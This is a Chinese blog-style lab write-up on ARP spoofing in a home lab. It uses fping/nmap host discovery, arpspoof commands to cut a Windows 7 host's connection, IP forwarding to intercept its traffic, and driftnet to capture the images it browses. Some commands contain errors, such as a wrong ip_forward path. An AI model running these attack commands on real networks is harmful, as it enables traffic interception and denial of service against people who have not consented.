arp欺骗+断网攻击

目录

一、实验环境

二、实验过程

1.Windows7

2.kali终端

3.主机存活扫描

4.利用arpspoof工具(断网)



一、实验环境

网关:192.168.2.1

Kali-Linux :192.168.2.13

Windows 7: 192.168.2.12

需求:两台主机在同一局域网,且能相互通信

二、实验过程

1.Windows7

在查看自身的MAC地址和网关IP地址, 输入命令  ipconfig /all

查看ARP缓存表中的网关MAC地址,输入命令  arp –a

2.kali终端

查看kali的MAC地址,输入命令“ifconfig”


3.主机存活扫描

方法1:执行ping扫描最简单的方法是使用工具fping,fping使用ICMP ECHO一次请求多个主机,对当前局域网还存在那些主机进行快速扫描,以确定要攻击的主机的ip地址。

fping –s –r 1 -g 192.168.2.0/24

方法2:执行nmap -v -n -sP 192.168.111.0/24,扫描网络中活跃的主机

4.利用arpspoof工具(断网)

arpspoof 是一款进行arp欺骗的工具,攻击者通过毒化受害者arp缓存,将网关mac替换为攻击者mac,然后攻击者可截获受害者发送和收到的数据包,可获取受害者账户、密码等相关敏感信息

1.命令格式:arpspoof  -i   网卡  -t 目标ip   网关

2.执行命令断网攻击 arpspoof  -i eth0 -t 192.168.2.12 192.168.2.1

3.当攻击开始,目标机就会断网,出现请求超时

4.查看arp缓存表,可以发现kali机mac地址和就是网关的mac地址

5.攻击利用

        Arp欺骗:目标ip的流量经过我的网卡,从网关出去。

        Arp断网:目标ip的流量经过我的网卡

1.echo 1 >/poc/sys/ipv4/ip_forward

设置ip流量转发,不会出现断网现象ip_forward=0为不转发,ip_forward=1为转发

2.目标主机能够正常上网

3.kali 中利用driftnet工具,可以捕获win7机器正在浏览的图片

Driftnet是一个监听网络流量并从它观察到的TCP流中提取图像的程序。

在命令行输入:

apt-get install

driftnetdriftnet -i eth0

4.win7主机上网,访问http网页图片时,kali就会抓取数据包

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

星期五&

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值